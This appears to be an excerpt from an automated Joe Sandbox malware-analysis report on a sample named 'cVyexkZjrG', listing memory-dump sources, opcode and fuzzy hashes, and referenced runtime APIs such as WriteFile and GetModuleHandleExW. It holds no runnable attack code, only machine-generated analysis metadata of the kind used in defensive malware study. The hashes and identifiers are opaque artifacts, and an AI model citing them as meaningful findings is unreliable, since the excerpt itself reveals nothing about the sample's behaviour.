                            • Instruction Fuzzy Hash: BE6203B5A0C344DFC714CF19D58061ABBE2BFC8744F248A2EE89987B65D770E849CB52
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a58f6c5b0b87d5f12fe17b5b5b78f65cee349bf84e9962db46f9d84bc39cd103
                            • Instruction ID: b5b3fdf1f4685440b7a65d6cbd2a0a07427492443967582047f12b1be5a2ffdd
                            • Opcode Fuzzy Hash: a58f6c5b0b87d5f12fe17b5b5b78f65cee349bf84e9962db46f9d84bc39cd103
                            • Instruction Fuzzy Hash: F8427171608B058FD324CF69D8807ABB7E2FB84314F054A2EE496C7BA4D774E589CB51
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dc8004adaa3259f52bc6ab735d8be8844deca4391a1dba6202427b66ce1407bc
                            • Instruction ID: d7ee81764473b1bb36a54ea7698fbaeedac321db9ba442ded7e42e1b15758fed
                            • Opcode Fuzzy Hash: dc8004adaa3259f52bc6ab735d8be8844deca4391a1dba6202427b66ce1407bc
                            • Instruction Fuzzy Hash: 1B02C5B3A0C3514BD718CF1DD890219B7E3BBC0394F6A4A2EE8D547BA4DBB09946C791
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                            • Instruction ID: f6d863ad83cb58fa613b5ce8a19fe7f81f549e60e7d9cd7046687f52258001f9
                            • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                            • Instruction Fuzzy Hash: 7202E872A0C3118BC319CF28D490269BBF2FBC4359F194B2EE49697EA4D774D944CB92
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 04f499f9e3d4c93c3ee3b28235ad2abed55ba3d5e2a4d0777d40b1e79efdc42e
                            • Instruction ID: a761e522d3c525fc36ec0b5c959b48dca8c47a8ec828a48815051f7b423df6d1
                            • Opcode Fuzzy Hash: 04f499f9e3d4c93c3ee3b28235ad2abed55ba3d5e2a4d0777d40b1e79efdc42e
                            • Instruction Fuzzy Hash: 9212A1706087618FC328CF2ED494626FBF2AF85305F188A6ED1D687EA1D735E548CB91
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 70a9c9e80daef2df3b25ccf8549349f6a1d4fdfd7731b9f920c9a3da36d7342a
                            • Instruction ID: 06a746fecc9dae7d909f82f62cf523bf731c5a205e11569bbd4f2ec1057c7a00
                            • Opcode Fuzzy Hash: 70a9c9e80daef2df3b25ccf8549349f6a1d4fdfd7731b9f920c9a3da36d7342a
                            • Instruction Fuzzy Hash: 06E1EA71704B048BE724CF2CD4A03AEB7E2EBC4314F548A2DC996C7B91DB75A54ACB91
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2bbd660b0b6b3ed67628fad2252f6cf995a3246cee064cb0bfa737aff63ec289
                            • Instruction ID: ae4c85b7a5644697c8e02ba1b94dd63760a696c468c3b362c6c4d0c6af4bcb1d
                            • Opcode Fuzzy Hash: 2bbd660b0b6b3ed67628fad2252f6cf995a3246cee064cb0bfa737aff63ec289
                            • Instruction Fuzzy Hash: DAF1B2706087518FC328CF2DD494266FBE2BF89304F184A6EE5D687EA1D339E554CB91
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b0f25bae375294626f84eebbb02985cc894b79d37dbce9afd4d280b88824898c
                            • Instruction ID: 587c2c94d310a424e809a49dab63ba56acf8d3c482042fe50823b851d73bcced
                            • Opcode Fuzzy Hash: b0f25bae375294626f84eebbb02985cc894b79d37dbce9afd4d280b88824898c
                            • Instruction Fuzzy Hash: C5F1DFB05087618BC329DF29D49026AFBF2BFC5304F188A3ED4D68ABA1D339E555CB51
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2d001f70021adf80f04e27e8359f5713b9c218b059c1a64901c9b96791ed9031
                            • Instruction ID: 6f1358499af4f7669fa3e4e784e9c8495c37eaadce42d12abe5f0bcbbb386fdb
                            • Opcode Fuzzy Hash: 2d001f70021adf80f04e27e8359f5713b9c218b059c1a64901c9b96791ed9031
                            • Instruction Fuzzy Hash: 47C1B1B1704B068BE328CF2DC4906AEB7E2FBC4314F548A2DC5A6C7B55D670B496CB81
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ec689b497c358338b72b358a92d889533f653208c8e8c7d7476938d601be6615
                            • Instruction ID: 81a6bc6454a2be481604cca02946f6dc5117c2dda45f24d9eb7441490cd6a2a1
                            • Opcode Fuzzy Hash: ec689b497c358338b72b358a92d889533f653208c8e8c7d7476938d601be6615
                            • Instruction Fuzzy Hash: 16E1E6B18047A64FE398EF5CDCA4A3577A1EBC8300F4B427DDA650B392D734A942DB94
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                            • Instruction ID: 99bdba5bae77ae43a34872af9b453753faf5ceed016cf6b9c74322241a84ec53
                            • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                            • Instruction Fuzzy Hash: 17C1C1357057418BC718CF3DD0A46A6BBE2EFDA318F148A6DC4CA4BB65DA30A40DCB55
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                            • Instruction ID: 1ed3059ba15a53bcf0212e51ba704752e370f140d112081ca8c9ebc715db7fdf
                            • Opcode Fuzzy Hash: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                            • Instruction Fuzzy Hash: D3B16F716052508FC350DF2DC484249BBA2FF8532CBB99A9EC4948FA56E376D847CB91
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                            • Instruction ID: 6fc902184e52478be78f141cb43c2bcb183ae4abb7e25fc83e6f4112c11fb029
                            • Opcode Fuzzy Hash: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                            • Instruction Fuzzy Hash: 7DD1F8B1848B9A5FD394EF4DEC81A357762AF88301F4A8239DB6007753D634BB12D794
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                            • Instruction ID: 5034a98d52acde562a8741317df0e86fa8e0228987f04e4ec622bf9ccb5e4d19
                            • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                            • Instruction Fuzzy Hash: BDB1E031309B054BD364DF39C8907EBB7E1AF81308F04492DC9AA87B91FF35A54A8799
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                            • Instruction ID: ffd68ceef75426bab75f8196a401279c741b94261a5dafa296f9e5c69f67c760
                            • Opcode Fuzzy Hash: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                            • Instruction Fuzzy Hash: B0612FB2308215CFD308CF99E580E96B3E5EBA9325B1685BED105CB361E771DC45CB58
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                            • Instruction ID: b47d5266ab453d3dc44a8a71c72e0619665c0b53877a1be9be0a026f74abb039
                            • Opcode Fuzzy Hash: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
APIs
• _ValidateLocalCookies.LIBCMT ref: 6CC59B07
• ___except_validate_context_record.LIBVCRUNTIME ref: 6CC59B0F
• _ValidateLocalCookies.LIBCMT ref: 6CC59B98
• __IsNonwritableInCurrentImage.LIBCMT ref: 6CC59BC3
• _ValidateLocalCookies.LIBCMT ref: 6CC59C18
Memory Dump Source
• Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
• Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 4e4f1c5f31a2ebf3d240ad24caad46529c9eb9fdbb390ce62cd321cc4f31586c
• Instruction ID: 1cc57b9c8c37b4a8db142ca121d384593ba0f0fc3be7175561bfd6161a9cdb36
• Instruction Fuzzy Hash: 5B41F170E102189FDF10CF69C880A9EBBB5FF42318F608195E8149BB51F731EA26CB94
Memory Dump Source
• Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
• Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
Similarity
• API ID:
• String ID: api-ms-$ext-ms-
• API String ID: 0-537541572
• Opcode ID: 18f99c423ae23fbe54681c191b2ca6d1b1eeec247785886e670e7b6042b9a61a
• Instruction ID: 0b9c611b52f489e8b0fe46f273ece8f6156b38a0fca8b54e01d7b46beabf845e
• Instruction Fuzzy Hash: 30218A32E16A21ABD711866BCEC0B4A3ABCAF07768B150655E915E7D81F730DD0186E1
APIs
• GetConsoleCP.KERNEL32(?,6CC6B0D0,?), ref: 6CC6BEF9
• __fassign.LIBCMT ref: 6CC6C0D8
• __fassign.LIBCMT ref: 6CC6C0F5
• WriteFile.KERNEL32(?,6CC75AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC6C13D
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CC6C17D
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC6C229
Memory Dump Source
• Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
• Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
Similarity
• API ID: FileWrite__fassign$ConsoleErrorLast
• String ID:
• API String ID: 4031098158-0
• Opcode ID: 556ee03fc92d5b4bab8200a6c5e01b37ce4e595c08bd3c68ee07228278fe1378
• Instruction ID: b953422cb32d4c270891d0f1860eb8885c08811f35310a60ba4725fc871e9c06
• Instruction Fuzzy Hash: C0D1B871E012489FDF05CFE9C9D09EDBBB5BF09314F28016AE855FBA41E631A946CB50
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 6CB22F95
• std::_Lockit::_Lockit.LIBCPMT ref: 6CB22FAF
• std::_Lockit::~_Lockit.LIBCPMT ref: 6CB22FD0
• __Getctype.LIBCPMT ref: 6CB23084
• std::_Facet_Register.LIBCPMT ref: 6CB2309C
• std::_Lockit::~_Lockit.LIBCPMT ref: 6CB230B7
Memory Dump Source
• Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
• Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
• String ID:
• API String ID: 1102183713-0
• Opcode ID: 054e623c6a4d2562d4dd3e7f2674e66fa93a24d9ca2027b4a715e4219482c546
• Instruction ID: 12660e480350965f68c9757864256acb9b131e4b1eeb2281cd5e683d23b6c4ba
• Instruction Fuzzy Hash: F8418971E006948FDB10CF94C840BAEBBB8FB49714F444118D819ABB90EB78A954CFE2
Memory Dump Source
• Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
• Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
Similarity
• API ID: __aulldiv$__aullrem
• String ID:
• API String ID: 2022606265-0
• Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
• Instruction ID: b29a5a1690c2dc2582c9ebe9cfba4c71434be462e9545c8dbcc438acb268170e
• Instruction Fuzzy Hash: E2218C30901219BFDF208FA5CD40DDFBE79FF817A9F208326B625616E0E2718D55C6A1
APIs
• __EH_prolog.LIBCMT ref: 6CC9A6F1
  • Part of subcall function 6CCA9173: __EH_prolog.LIBCMT ref: 6CCA9178
• __EH_prolog.LIBCMT ref: 6CC9A8F9
Memory Dump Source
• Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
• Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
Similarity
• API ID: H_prolog
• String ID: IJ$WIJ$J
• API String ID: 3519838083-740443243
• Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
• Instruction ID: d9f640b483fe19e2f7fbc7cdb3d2bbf284b5bc9c61a0348778a30282e516bb33
• Instruction Fuzzy Hash: CF71B130D01255DFDB14CFA4C484BEEBBF0BF54308F1080A9D959ABB91EB74AA09CB95
APIs
• _free.LIBCMT ref: 6CC75ADD
• _free.LIBCMT ref: 6CC75B06
• SetEndOfFile.KERNEL32(00000000,6CC746EC,00000000,6CC6B0D0,?,?,?,?,?,?,?,6CC746EC,6CC6B0D0,00000000), ref: 6CC75B38
• GetLastError.KERNEL32(?,?,?,?,?,?,?,6CC746EC,6CC6B0D0,00000000,?,?,?,?,00000000,?), ref: 6CC75B54
Memory Dump Source
• Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
• Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
Similarity
• API ID: _free$ErrorFileLast
• String ID: 8Q
• API String ID: 1547350101-4022487301
• Opcode ID: a98e22df2d28995218545cef584bfe413efaa721a850a8525b20d7c1aa5332fb
• Instruction ID: 3d1fc9418709c21783204f7a9a88ceaeeadf7f918793e7981f33c1e409c07507
• Instruction Fuzzy Hash: C141A372A00605ABDF219BA9CC81BEE3B75EF45338F240525E424E7B90FB35C8958775
APIs
• __EH_prolog.LIBCMT ref: 6CCAE41D
  • Part of subcall function 6CCAEE40: __EH_prolog.LIBCMT ref: 6CCAEE45
  • Part of subcall function 6CCAE8EB: __EH_prolog.LIBCMT ref: 6CCAE8F0
  • Part of subcall function 6CCAE593: __EH_prolog.LIBCMT ref: 6CCAE598
Memory Dump Source
• Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
• Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
Similarity
• API ID: H_prolog
• String ID: &qB$0aJ$A0$XqB
• API String ID: 3519838083-1326096578
• Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
• Instruction ID: 464bcd55354c925141d70715fa0e32be0343b187fedf69dcf7fa4ce892406833
• Instruction Fuzzy Hash: 2B217C71D01258AACB08DBE4D9949DEBFB4AF55318F10406DD41677780EB785A0CCB51
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CC5F1B4,00000000,?,6CC5F235,6CC59C49,00000003,00000000), ref: 6CC5F13F
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CC5F152
• FreeLibrary.KERNEL32(00000000,?,?,6CC5F1B4,00000000,?,6CC5F235,6CC59C49,00000003,00000000), ref: 6CC5F175
Memory Dump Source
• Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
• Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 6a46416cc01c03a2b2a669f58b6bf2f247d969076ba800c258e62cca5f65aab0
• Instruction ID: ad0540d849bb83aad3d6f5330b045be0f71b37e9ee61be24874b6d2cc54d90b8
• Instruction Fuzzy Hash: 9EF08C32A03128FBDF02EB91C919B9F7E7CEB0675AF600064E801E2550EB308E10DA94
APIs
• __EH_prolog3.LIBCMT ref: 6CC5732E
• std::_Lockit::_Lockit.LIBCPMT ref: 6CC57339
• std::_Lockit::~_Lockit.LIBCPMT ref: 6CC573A7
  • Part of subcall function 6CC57230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CC57248
• std::locale::_Setgloballocale.LIBCPMT ref: 6CC57354
• _Yarn.LIBCPMT ref: 6CC5736A
Memory Dump Source
• Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
• Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
Similarity
• API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
• String ID:
• API String ID: 1088826258-0
• Opcode ID: 4dc2632c62239d6e102a04ba864df418e42b5810df1aca275a3463dfeba0a75d
• Instruction ID: 3ed6c490e51186fef0d8aef073e1cd9e0b3bd5cd59352eeb96adafb9b646f4e9
